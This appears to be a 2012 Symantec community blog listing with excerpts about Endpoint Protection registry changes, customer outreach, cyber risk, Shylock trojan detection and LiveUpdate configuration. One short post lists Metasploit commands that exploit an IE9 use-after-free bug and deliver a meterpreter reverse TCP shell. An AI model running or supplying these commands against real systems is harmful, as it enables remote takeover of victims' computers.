Security Community Blog
Showing posts tagged with Endpoint Protection (AntiVirus)
Mithun Sanghavi | 06 Nov 2012 | 0 comments


To provide better support for a set of registry keys that are commonly used for client monitoring, the following subkeys have been moved in Symantec Endpoint Protection version 12.1.1100. If you run custom scripts against the Symantec Endpoint Protection registry, or if you have written a remote monitoring solution for an earlier release, you will need to revise them when you upgrade to this release.

All new registry subkeys are placed in the following location: HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\CurrentVersion\Public-Opstate.

Note: This list includes only registry subkeys that were moved in this release. New subkeys are documented elsewhere.

Warning: All registry subkeys and values for Symantec Endpoint Protection should be treated as read-only.



Symantec Corp. | 29 Oct 2012 | 0 comments

The Symantec Endpoint Protection and Mobility Group (EMG) has taken the goal of listening to “the voice of the customer” to a whole new level. This case study explains how EMG implemented an Outreach program that centers on talking to survey respondents. The details and personal insights they discover by speaking directly to customers allow them to make substantial improvements in the product and customer experience.

Surveys provide excellent feedback from customers, but nothing beats talking one-on-one to the people who use your product. “Every quarter we conduct a customer survey,” said Andrew Pendray, Director of Product Management for Pricing, Licensing and Analytics for the Endpoint Protection and Mobility Group (EMG), which includes Symantec Endpoint Protection (SEP) and other core security products. “Once the survey closes, we carefully analyze the numeric results. While that information is extremely helpful, the respondents...

James Hanlon | 15 Oct 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hacktivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increase in web based attacks and an increased focus and intensity of advanced persistent malware. Furthermore, Symantec...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

One example is from a customer who had one product designed to AV scan the contents of a USB pen drive upon connection to the machine, and another product to encrypt USB pen drives upon connection. This is great if the admin could enforce this order, but what was actually happening is...

Eileen | 02 Oct 2012 | 0 comments

In this video, Sergei Tomlin, IT Director at Blackfoot Medical Center, discusses how his organization is using Symantec Endpoint Protection and Symantec Backup Exec. Some benefits highlighted are the ability to back up both physical and virtual environments and the ability to manage and control applications deployed in their environment. Check out Blackfoot Medical Center’s whole story in this video.



Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We have a vulnerability in IE 9, discovered on 17/09/2012, which can be exploited with the following commands in Backtrack 5 R2:


- msfupdate
- use exploit/windows/browser/ie_execcommand_uaf
- set SRVHOST 192.168 ...
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168 ...
- exploit

Let's beware the networking.


Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.

File-Based Protection (Traditional Antivirus)

Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...

Brandon Noble | 23 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot more functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally, we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name as the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior for threats, as noted in this blog article from May 2012,...

ABN | 22 Aug 2012 | 1 comment

Hello Gents,

We normally come across scenarios where LiveUpdate affects our usual work as a Symantec administrator. Scenarios like:

  1. Clients do not have the ability to launch LiveUpdate even though the policy has been set to allow it, or vice versa.
  2. Low disk space causing SEP not to update on critical servers. Definitions are stored only on the OS drive, where space is a major concern.

By default the SEP definitions will be stored in the Operating System drive even if we install it in a different partition.

With the following process we can configure the LiveUpdate settings, the number of revisions that are kept on the SEP (client) and also change the location where they are stored.

I )   To enable LiveUpdate on the SEP.

    From SEPM: